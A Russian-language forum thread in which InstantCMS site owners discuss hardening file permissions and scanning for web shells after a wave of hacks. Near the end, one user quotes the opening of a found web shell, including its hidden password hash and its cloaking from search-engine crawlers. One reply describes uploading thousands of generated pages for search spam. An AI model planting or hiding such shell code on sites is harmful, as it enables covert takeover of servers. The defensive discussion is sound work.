Приветствую!
В последнее время участились попытки взлома сайтов на Инстанте, поэтому решил еще раз напомнить основные меры предосторожности. Если вы в этом ничего не понимаете — в конце поста есть скрипт для сканирования сайта на потенциальные уязвимости.
1я цифра — права владельца
2я цифра — права группы
3я цифра — права всех остальных
1. Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты.
2. Права на все папки должны быть 755 (кроме тех, в которые должны быть разрешена запись)
3. Права на все файлы должны быть 644 (кроме тех, которые разрешено редактировать)
Если владелец папок/файлов совпадает с юзером, под которым выполняются скрипты(и нет возможности это исправить — например на вирт хостинге), то права нужно выставить другие:
1. Права на все папки должны быть 555 (кроме тех, в которые должны быть разрешена запись — кэш, images, upload)
2. Права на все файлы должны быть 444 (кроме тех, которые разрешено редактировать)
PS если не уверены в настройке прав на своем сайте — не поленитесь скачать скрипт и запустить.
В последнее время участились попытки взлома сайтов на Инстанте, поэтому решил еще раз напомнить основные меры предосторожности. Если вы в этом ничего не понимаете — в конце поста есть скрипт для сканирования сайта на потенциальные уязвимости.
1я цифра — права владельца
2я цифра — права группы
3я цифра — права всех остальных
1. Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты.
2. Права на все папки должны быть 755 (кроме тех, в которые должны быть разрешена запись)
3. Права на все файлы должны быть 644 (кроме тех, которые разрешено редактировать)
Если владелец папок/файлов совпадает с юзером, под которым выполняются скрипты(и нет возможности это исправить — например на вирт хостинге), то права нужно выставить другие:
1. Права на все папки должны быть 555 (кроме тех, в которые должны быть разрешена запись — кэш, images, upload)
2. Права на все файлы должны быть 444 (кроме тех, которые разрешено редактировать)
Существует простой способ просканировать сайт на шеллы (может найдет не 100%, но основные выявит) и проверить права на папки.
Для этого скачайте файл (автор скрипта Григорий Земсков), закиньте в корень сайта и запустите. Обратите внимание на доступные к записи папки. После проверки файл нужно удалить.PS если не уверены в настройке прав на своем сайте — не поленитесь скачать скрипт и запустить.
Просто псевдостраниц заливается очень большое количество, тысячи. И что-то да попадает на некоторое время в поиск, пока Яндекс не выкинет.
Вы можете попробовать, нагенерить страниц по каким-то запросам, и закинуть на сайт. Трафик пойдет некоторое время, но потом будет хуже.
для успокоения сравните размеры этих файлов на сервере и в дистрибутиве
есть еще какие-нить дополнительные варианты предохранений от взлома? например, ну незнаю - скажем правильно настроенный .htaccess
поставить пароль на папку с сайтом)
можно в сам скрипт в начале добавить проверку на админа
то есть если он открывается не от лица Инстантовского юзера с правами администратора, то ничего не делать. Тогда напрямую его никто посторонний не сможет открыть.
Вот только построено на примере "Информация PHP", и даже она открывается прямым запросом http://сайт/admin/includes/phpinfo.php ... :(
отсюда и доп защита через паролирование...
Я так глубоко не копал
-----------------------------------------------------
http://dle-news.ru/modules/1058-zeos-antivirus.html
а мне этот понравился, может он хуже чем айболит?
считает контрольные суммы
а этого для контроля мне кажется достаточно
Скрипт использует подозрительный код: ./admin/applets/phpinfo.php ./admin/includes/phpinfo.php ./assets/php/phpmailer/class.phpmailer.php ./core/cms.php ./includes/bbcode/bbcode.lib.php ./plugins/p_fckeditor/fckeditor/fckeditor_php4.php ./plugins/p_fckeditor/fckeditor/fckeditor_php5.php Небезопасно! Директории, доступные скрипту на запись: ./admin ./admin/ajax ./admin/applets ./admin/components ./admin/components/actions ./admin/components/arhive ./admin/components/autoawards ./admin/components/autoawards/images ./admin/components/banners ./admin/components/blogs ./admin/components/board ./admin/components/catalog ./admin/components/catalog/js ./admin/components/clubs ./admin/components/comments ./admin/components/content ./admin/components/faq ./admin/components/forms ./admin/components/forumНо если так и стоит и папка доступна для записи - ставьте 555
Немного точнее этот момент.
2 вопрос. Если в Исп менеджере стоят на общую папку сайтов права 755, так и оставить либо ставим 777 и далее по инструкции?
Вот еще нашел пост, который писал Fuze - показать.. Пункты 2-6 актуальны, я написал почти то же самое.
Пора уже давно было привыкать к консоли и от неё оталкиваться.
Скачать айболита, запустить(либо по моей ссылке, либо тут еще кидали - более новая версия). Если будут найдены вирусы - почистить. Если открыты права на запись в ненужные папки - исправить.
Через какую дыру произошел очередной массовый взлом инстанта???
еще бы кто защитные скрипты к админке привязал бы
Положил файл - запускаю - выводится листинг файла без выполнения.
Добавил в начала к <? слово php и заработало.
Причем с этой проблемой уже не раз встречаюсь.
Подскажите - от чего так?
Для кодеров всё же считается хорошим тоном писать в коде <?php ?> для портативности скриптов.
А вот ещё один вопросец - из это темы......
У меня была проблема в админке iChat - не выводились значения параметров и вообще ничего нельзя было изменить - решилось изменением в backend.php строк с <?=@ на <?php echo
Причем локально - на Денвере - никаких проблем - а вот на рабочем сервере была беда. Подозреваю что возможно что-то не так настроено в PHP - но мне легче было изменить код - нежели разбираться в необходимых настройках PHP - так как все остальное вроде работает исправно.
Это из этой же истории??
Хотя вопрос безопасности очень актуален - нужно будет этому уделить отдельное внимание
SJen спасибо за разжевывание материала)))
проверяла старые архивы антивир нашел шелл ,не помню должен ли быть вообще данный файл,в самом верху у меня было прописано:
<?php # Web Shell by oRb
$auth_pass = "63aad2be69b352c04c987854823a5e";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
"Владелец всех папок/файлов сайта должен отличаться от юзера, под которым выполняются скрипты".
То есть, если я, например, владелец сайта (он же - админ). А кто тогда юзер, под которым выполняются скрипты?